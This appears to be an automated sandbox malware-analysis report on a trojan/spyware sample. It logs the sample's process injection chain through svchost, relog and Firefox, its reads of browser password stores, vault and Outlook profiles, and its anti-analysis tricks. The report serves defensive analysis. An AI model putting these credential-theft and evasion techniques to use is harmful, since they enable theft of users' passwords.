Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B8B950	8_2_02B8B950
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B79EB0	8_2_02B79EB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B71F92	8_2_02B71F92
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B33FD2	8_2_02B33FD2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B33FD5	8_2_02B33FD5
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C2FFB1	8_2_02C2FFB1
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C2FF09	8_2_02C2FF09
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C2FCF2	8_2_02C2FCF2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BE9C32	8_2_02BE9C32
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B8FDC0	8_2_02B8FDC0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C21D5A	8_2_02C21D5A
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C27D73	8_2_02C27D73
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B73D40	8_2_02B73D40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_00141A30	8_2_00141A30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0013C910	8_2_0013C910
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0013AB10	8_2_0013AB10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0013CB30	8_2_0013CB30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0013AC5C	8_2_0013AC5C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0013AC60	8_2_0013AC60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_00145110	8_2_00145110
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_00143310	8_2_00143310
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0015B860	8_2_0015B860
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0297E263	8_2_0297E263
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0297E144	8_2_0297E144
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0297D6C8	8_2_0297D6C8
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0297E5FC	8_2_0297E5FC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0297C978	8_2_0297C978

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0302B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03087E54 appears 111 times
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: String function: 00F07DE1 appears 35 times
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: String function: 00F20AE3 appears 70 times
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: String function: 00F28900 appears 42 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 02BDEA12 appears 86 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 02BB7E54 appears 111 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 02BA5130 appears 61 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 02B5B970 appears 277 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 02BEF290 appears 105 times

Source: k9OEsV37GE.exe, 00000000.00000003.1339071436.00000000044CD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs k9OEsV37GE.exe
Source: k9OEsV37GE.exe, 00000000.00000003.1338942515.0000000004323000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs k9OEsV37GE.exe

Source: k9OEsV37GE.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@15/12

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F6A06A GetLastError,FormatMessageW,

0_2_00F6A06A

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F581CB AdjustTokenPrivileges,CloseHandle,		0_2_00F581CB
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00F587E1

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F6B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00F6B3FB

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F7EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00F7EE0D

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F783BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00F783BB

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F04E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00F04E89

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

File created: C:\Users\user~1\AppData\Local\Temp\aut41C4.tmp

Jump to behavior

Source: k9OEsV37GE.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: relog.exe, 00000008.00000003.1881131329.000000000272E000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000003.1883278990.000000000275B000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000002.3751067830.0000000002781000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000002.3751067830.0000000002750000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000003.1881131329.0000000002750000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: k9OEsV37GE.exe	ReversingLabs: Detection: 76%
Source: k9OEsV37GE.exe	Virustotal: Detection: 66%

Source: unknown	Process created: C:\Users\user\Desktop\k9OEsV37GE.exe "C:\Users\user\Desktop\k9OEsV37GE.exe"
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\k9OEsV37GE.exe"
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\k9OEsV37GE.exe"	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\relog.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\relog.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: k9OEsV37GE.exe

Static file information: File size 1293824 > 1048576

Source: k9OEsV37GE.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: k9OEsV37GE.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: k9OEsV37GE.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: k9OEsV37GE.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: k9OEsV37GE.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: k9OEsV37GE.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: k9OEsV37GE.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: relog.pdbGCTL source: svchost.exe, 00000005.00000003.1646285902.0000000000825000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1646265214.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1646059395.000000000081B000.00000004.00000020.00020000.00000000.sdmp, ClIUTLKtdeP.exe, 00000007.00000002.3752091538.0000000000778000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: relog.pdb source: svchost.exe, 00000005.00000003.1646285902.0000000000825000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1646265214.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1646059395.000000000081B000.00000004.00000020.00020000.00000000.sdmp, ClIUTLKtdeP.exe, 00000007.00000002.3752091538.0000000000778000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ClIUTLKtdeP.exe, 00000007.00000002.3745419122.000000000020E000.00000002.00000001.01000000.00000005.sdmp, ClIUTLKtdeP.exe, 00000009.00000002.3745331317.000000000020E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: k9OEsV37GE.exe, 00000000.00000003.1339410746.0000000004250000.00000004.00001000.00020000.00000000.sdmp, k9OEsV37GE.exe, 00000000.00000003.1337296652.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1678675724.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1678675724.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1569339237.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1571391216.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000002.3752528747.0000000002B30000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000008.00000002.3752528747.0000000002CCE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000008.00000003.1678223144.00000000027CA000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000003.1680451814.000000000297E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: k9OEsV37GE.exe, 00000000.00000003.1339410746.0000000004250000.00000004.00001000.00020000.00000000.sdmp, k9OEsV37GE.exe, 00000000.00000003.1337296652.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000005.00000002.1678675724.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1678675724.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1569339237.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1571391216.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, relog.exe, relog.exe, 00000008.00000002.3752528747.0000000002B30000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000008.00000002.3752528747.0000000002CCE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000008.00000003.1678223144.00000000027CA000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000003.1680451814.000000000297E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: relog.exe, 00000008.00000002.3751067830.00000000026D1000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000002.3753170617.000000000315C000.00000004.10000000.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000009.00000002.3753813140.00000000027EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1990342033.00000000066AC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: relog.exe, 00000008.00000002.3751067830.00000000026D1000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000008.00000002.3753170617.000000000315C000.00000004.10000000.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000009.00000002.3753813140.00000000027EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1990342033.00000000066AC000.00000004.80000000.00040000.00000000.sdmp

Source: k9OEsV37GE.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: k9OEsV37GE.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: k9OEsV37GE.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: k9OEsV37GE.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: k9OEsV37GE.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F04B37 LoadLibraryA,GetProcAddress,

0_2_00F04B37

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F28945 push ecx; ret	0_2_00F28958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00473280 push eax; ret	5_2_00473282
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00484323 push cs; retf	5_2_0048436D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00487BE2 push edi; iretd	5_2_00487BEC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00487C30 push esi; ret	5_2_00487C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0047D5CD push es; ret	5_2_0047D5D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00487DF9 push FFFFFF83h; retf	5_2_00487E04
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00471753 push edi; retf	5_2_00471754
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030309AD push ecx; mov dword ptr [esp], ecx	5_2_030309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0300135E push eax; iretd	5_2_03001369
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B3225F pushad ; ret	8_2_02B327F9
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B327FA pushad ; ret	8_2_02B327F9
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B3283D push eax; iretd	8_2_02B32858
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B609AD push ecx; mov dword ptr [esp], ecx	8_2_02B609B6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_00150267 push esp; ret	8_2_0015026A
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0014495F push edi; iretd	8_2_00144969
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_001449AD push esi; ret	8_2_001449AF
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_00144B76 push FFFFFF83h; retf	8_2_00144B81
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_00130FF9 push 00000007h; ret	8_2_00130FFE
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0013DEE9 push ecx; retf	8_2_0013DEF6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0297511D push 00000036h; iretd	8_2_02975127
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_029757F4 push es; iretd	8_2_02975802
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02975701 push esp; ret	8_2_02975702
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0297577A push es; iretd	8_2_02975802
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02975FB6 push cs; retf	8_2_02975FB7
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0297BFF6 push ss; ret	8_2_0297C00B
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0297EF1D push ds; ret	8_2_0297EF1F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02979F7E pushfd ; retf	8_2_02979F87
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0297BCFA push edi; retf	8_2_0297BD08
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02973D7B push 9BC5D6BBh; ret	8_2_02973D80

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00F048D7
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F85376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00F85376

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F23187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00F23187

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	API/Special instruction interceptor: Address: 18F5F14
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_0307096E rdtsc

5_2_0307096E

Source: C:\Windows\SysWOW64\relog.exe	Window / User API: threadDelayed 592			Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Window / User API: threadDelayed 9380			Jump to behavior

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\relog.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\relog.exe TID: 2076	Thread sleep count: 592 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe TID: 2076	Thread sleep time: -1184000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe TID: 2076	Thread sleep count: 9380 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe TID: 2076	Thread sleep time: -18760000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe TID: 6788	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe TID: 6788	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe TID: 6788	Thread sleep time: -51000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe TID: 6788	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe TID: 6788	Thread sleep time: -39000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\relog.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\relog.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F6445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00F6445A
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F6C6D1 FindFirstFileW,FindClose,	0_2_00F6C6D1
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00F6C75C
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F6EF95
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F6F0F2
